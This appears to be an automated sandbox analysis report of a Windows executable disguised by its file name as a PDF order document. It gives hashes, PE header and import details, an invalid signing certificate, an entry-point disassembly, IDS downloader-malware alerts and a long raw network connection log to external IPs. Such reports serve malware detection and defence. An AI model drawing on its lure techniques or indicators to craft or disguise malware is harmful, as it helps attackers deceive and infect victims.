                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:Order requirements CIF Greece_pdf.exe
                                                                                                                                      File size:832'624 bytes
                                                                                                                                      MD5:998e394361bd54c58a1ad2092fca8b6c
                                                                                                                                      SHA1:c68e7856324a50c04ee5e1de46952ecaed47eff7
                                                                                                                                      SHA256:87f519d29ebc3fb1b6bed4a5e7ac4865b029da69d2608548a8db34e4069673ec
                                                                                                                                      SHA512:bb7af9d97e4fed96e000048828826f715fa3f229058326da25cf535629e567389b6129e72b6ef214937f0429d74d35598a7f440af6221ecc56ddeea86f9733b1
                                                                                                                                      SSDEEP:12288:a7CBVenOxJUbx7lU0hbB6y3bn6vlP9Ia8GIbPYkAdwvLRPC6Oe73MFce:6G+OxmF7mSB6yrnMIacPYkAevLRPJyF
                                                                                                                                      TLSH:E60512072136E1F1D8388836485376E65BCA5C605E0D6F26315ABF3B79B22D47E1B22B
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@
                                                                                                                                      Icon Hash:0765c050447c3e01
                                                                                                                                      Entrypoint:0x403325
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:true
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x60FC909C [Sat Jul 24 22:13:48 2021 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:ced282d9b261d1462772017fe2f6972b
                                                                                                                                      Signature Valid:false
                                                                                                                                      Signature Issuer:CN=Vendaval, O=Vendaval, L=Haudivillers, C=FR
                                                                                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                      Error Number:-2146762487
                                                                                                                                      Not Before, Not After
                                                                                                                                      • 16/10/2024 03:24:21 16/10/2027 03:24:21
                                                                                                                                      Subject Chain
                                                                                                                                      • CN=Vendaval, O=Vendaval, L=Haudivillers, C=FR
                                                                                                                                      Version:3
                                                                                                                                      Thumbprint MD5:CEAC84E69D2B35543F379F5348D1B810
                                                                                                                                      Thumbprint SHA-1:B31B5A0A2F3CAD83BF481389270D92D9B71C6A0A
                                                                                                                                      Thumbprint SHA-256:F0F681D43F4BFD3AC96CF9515589D4DDC5F6B806E59C9650FAF1C8748510A317
                                                                                                                                      Serial:4204D7DF191826CD591C56FB4CE48EAA65DF4676
                                                                                                                                      Instruction
                                                                                                                                      sub esp, 00000184h
                                                                                                                                      push ebx
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      xor ebx, ebx
                                                                                                                                      push 00008001h
                                                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                                                      mov dword ptr [esp+10h], 0040A198h
                                                                                                                                      mov dword ptr [esp+20h], ebx
                                                                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                                                                      call dword ptr [004080B8h]
                                                                                                                                      call dword ptr [004080BCh]
                                                                                                                                      and eax, BFFFFFFFh
                                                                                                                                      cmp ax, 00000006h
                                                                                                                                      mov dword ptr [007A2F6Ch], eax
                                                                                                                                      je 00007F1CD8DE1293h
                                                                                                                                      push ebx
                                                                                                                                      call 00007F1CD8DE43F6h
                                                                                                                                      cmp eax, ebx
                                                                                                                                      je 00007F1CD8DE1289h
                                                                                                                                      push 00000C00h
                                                                                                                                      call eax
                                                                                                                                      mov esi, 004082A0h
                                                                                                                                      push esi
                                                                                                                                      call 00007F1CD8DE4372h
                                                                                                                                      push esi
                                                                                                                                      call dword ptr [004080CCh]
                                                                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                                                                      cmp byte ptr [esi], bl
                                                                                                                                      jne 00007F1CD8DE126Dh
                                                                                                                                      push 0000000Bh
                                                                                                                                      call 00007F1CD8DE43CAh
                                                                                                                                      push 00000009h
                                                                                                                                      call 00007F1CD8DE43C3h
                                                                                                                                      push 00000007h
                                                                                                                                      mov dword ptr [007A2F64h], eax
                                                                                                                                      call 00007F1CD8DE43B7h
                                                                                                                                      cmp eax, ebx
                                                                                                                                      je 00007F1CD8DE1291h
                                                                                                                                      push 0000001Eh
                                                                                                                                      call eax
                                                                                                                                      test eax, eax
                                                                                                                                      je 00007F1CD8DE1289h
                                                                                                                                      or byte ptr [007A2F6Fh], 00000040h
                                                                                                                                      push ebp
                                                                                                                                      call dword ptr [00408038h]
                                                                                                                                      push ebx
                                                                                                                                      call dword ptr [00408288h]
                                                                                                                                      mov dword ptr [007A3038h], eax
                                                                                                                                      push ebx
                                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                                      push 00000160h
                                                                                                                                      push eax
                                                                                                                                      push ebx
                                                                                                                                      push 0079E528h
                                                                                                                                      call dword ptr [0040816Ch]
                                                                                                                                      push 0040A188h
                                                                                                                                      Programming Language:
                                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3bd0000x14130.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xcab700x900.data
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x62300x64001ac97b0b8e41e1ffbb716878bb5109f2False0.6699609375data6.441889952551939IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rdata0x80000x12740x1400b8e42f3d3b81b0e2a4080ab31bc2d1f4False0.4337890625data5.061067348371254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0xa0000x3990780x600be2892f1b11a971e0c6c4e83000268f5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .ndata0x3a40000x190000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0x3bd0000x141300x1420074d1354884b47e58064558c4fcf827a8False0.21642080745341616data5.032566659343803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_ICON0x3bd4480x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 0EnglishUnited States0.1216102585663233
                                                                                                                                      RT_ICON0x3c68f00x2ca8Device independent bitmap graphic, 96 x 192 x 8, image size 0EnglishUnited States0.33869839048285516
                                                                                                                                      RT_ICON0x3c95980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.22634854771784232
                                                                                                                                      RT_ICON0x3cbb400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.31636960600375236
                                                                                                                                      RT_ICON0x3ccbe80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.30676972281449894
                                                                                                                                      RT_ICON0x3cda900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.4413934426229508
                                                                                                                                      RT_ICON0x3ce4180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.3768050541516246
                                                                                                                                      RT_ICON0x3cecc00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.4400921658986175
                                                                                                                                      RT_ICON0x3cf3880x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.14634146341463414
                                                                                                                                      RT_ICON0x3cf9f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.43786127167630057
                                                                                                                                      RT_ICON0x3cff580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.37056737588652483
                                                                                                                                      RT_ICON0x3d03c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.18548387096774194
                                                                                                                                      RT_ICON0x3d06a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.4594594594594595
                                                                                                                                      RT_DIALOG0x3d07d00x100dataEnglishUnited States0.5234375
                                                                                                                                      RT_DIALOG0x3d08d00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                      RT_DIALOG0x3d09f00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                      RT_DIALOG0x3d0ab80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                      RT_GROUP_ICON0x3d0b180xbcdataEnglishUnited States0.601063829787234
                                                                                                                                      RT_VERSION0x3d0bd80x214dataEnglishUnited States0.5338345864661654
                                                                                                                                      RT_MANIFEST0x3d0df00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                      DLLImport
                                                                                                                                      ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                                                                      SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                                                                      ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                      USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishUnited States
                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-11-21T10:36:47.259837+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736142.250.186.78443TCP
                                                                                                                                      2024-11-21T10:36:56.775750+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738132.226.247.7380TCP
                                                                                                                                      2024-11-21T10:36:59.510233+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738132.226.247.7380TCP
                                                                                                                                      2024-11-21T10:37:01.172336+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449740188.114.96.3443TCP
                                                                                                                                      2024-11-21T10:37:02.650777+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449742132.226.247.7380TCP
                                                                                                                                      2024-11-21T10:37:17.561437+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449782188.114.96.3443TCP
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 21, 2024 10:36:44.980994940 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:44.981054068 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:44.981163025 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:45.121364117 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:45.121416092 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:46.510962009 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:46.511061907 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:46.511744976 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:46.511811018 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:46.646081924 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:46.646126032 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:46.646533012 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:46.646599054 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:46.733537912 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:46.779337883 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:47.259778976 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:47.260000944 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:47.260029078 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:47.260107994 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:47.260230064 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:47.260267019 CET44349736142.250.186.78192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:47.260322094 CET49736443192.168.2.4142.250.186.78
                                                                                                                                      Nov 21, 2024 10:36:47.503606081 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:47.503648043 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:47.503726959 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:47.504060030 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:47.504076958 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:48.987441063 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:48.987561941 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:48.991178036 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:48.991188049 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:48.991451979 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:48.991523027 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:48.991853952 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:49.035357952 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.753031969 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.753096104 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.762665987 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.762717962 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.872567892 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.872709036 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.872724056 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.872765064 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.876586914 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.876641989 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.964488983 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.964569092 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.967269897 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.967356920 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.967366934 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.967410088 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.974812984 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.974874020 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.977854013 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.977904081 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.985563993 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.985626936 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.985793114 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.985841036 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.994340897 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.994395971 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:51.994405031 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:51.994461060 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.001476049 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.001539946 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.001560926 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.001605988 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.008795023 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.008857965 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.008950949 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.008997917 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.014961958 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.015012980 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.021059036 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.021116972 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.021128893 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.021179914 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.027422905 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.027483940 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.027508974 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.027560949 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.034250021 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.034300089 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.039671898 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.039726019 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.039731979 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.039776087 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.045834064 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.045890093 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.045939922 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.045994997 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.052409887 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.052469015 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.052530050 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.052577972 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.058391094 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.058449030 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.174149990 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.174236059 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.174259901 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.174315929 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.177469015 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.177527905 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.183216095 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.183291912 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.183392048 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.183437109 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.189332008 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.189393044 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.189562082 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.189610004 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.195553064 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.195606947 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.196003914 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.196053982 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.196085930 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.196135998 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.201678991 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.201746941 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.207899094 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.207961082 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.208031893 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.208076954 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.214230061 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.214293957 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.214351892 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.214400053 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.218914986 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.218977928 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.219118118 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.219165087 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.223526955 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.223587990 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.227962971 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.228019953 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.228348970 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.228394985 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.232613087 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.232669115 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.232973099 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.233025074 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.237432957 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.237490892 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.237721920 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.237771988 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.241782904 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.241837025 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.246400118 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.246464014 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.246562004 CET44349737172.217.16.129192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:52.246609926 CET49737443192.168.2.4172.217.16.129
                                                                                                                                      Nov 21, 2024 10:36:52.251202106 CET44349737172.217.16.129192.168.2.4
